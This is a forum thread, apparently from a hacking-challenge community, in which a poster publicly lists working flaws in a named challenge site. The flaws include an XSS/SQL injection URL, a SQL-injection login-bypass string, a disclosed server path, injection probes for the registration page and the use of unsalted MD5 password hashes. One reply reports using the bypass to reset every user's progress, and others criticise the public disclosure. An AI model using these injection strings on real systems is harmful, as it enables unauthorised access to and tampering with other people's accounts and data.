a new site at that wechall.net thingie<br><br>xss at<br>http://www.lost-chall.org/activation.php?user=x'<br>(sql injetion too)<br><br>if you don't want to create an account you can login using<br>username: Inferno' or '1'='1<br>password: anything<br><br>full path disclosure<br>/home/www/web453/html/index.php<br><br>sql injection in the register.php<br>enter username:<br>x' and '1'='1<br>x' and '2'='1<br><br>thank you for registering: Inferno, Kender, ...<br>The website uses unsalted md5hashes of your passwords.<br>Which i'm confident you don't use anywhere else in the world. Not that i would admit it if i knew otherwise.<br><br>one final vulnerability is that this website is open to a lot of flac from anybody who owns Lost Intellectual property. <br><br>just some minor vulnerabilities...
heh solving a challenge, after logging in as <br>Inferno' or '1'='1<br><br>reset every bodies challenge count. I guess that's going to upset thehivemind
Gee, thanks Rhican, for \"helping\" another community member.<br><br>But why tell us? We can't fix it. Tell the admin of the site in stead, so he can fix it.<br>Perhaps you might even go so far as to suggest some resources about preventing this kind of issues to him.<br>
Hmm I alerted Varg a few days ago, but he only managed to fix the ones I found...<br>Btw rhican u should try this site: <a href="%5C"><img alt="\"link\"" src="%5C">http://www.darkmindz.com</a><br>Romeo would be excited to hear from u.
<img alt="\":P\"" src="%5C"> It was because I was logged in and too lazy to log out to try that <img alt="\":P\"" src="%5C"><br>Btw Romeo said u only pwned noobs site and can't touch his site. Maybe u can find the original text in a blog somewhere.
<div class="\"tbscode_standard_quote_headline\""><img alt="\"Quote\"" src="%5C">Quote from <a href="%5C">quangntenemy</a>:</div><div class="\"tbscode_standard_quote\""><img alt="\":P\"" src="%5C"> It was because I was logged in and too lazy to log out to try that <img alt="\":P\"" src="%5C"><br>Btw Romeo said u only pwned noobs site and can't touch his site. Maybe u can find the original text in a blog somewhere.</div><br><br>what am I twelve?<br><br>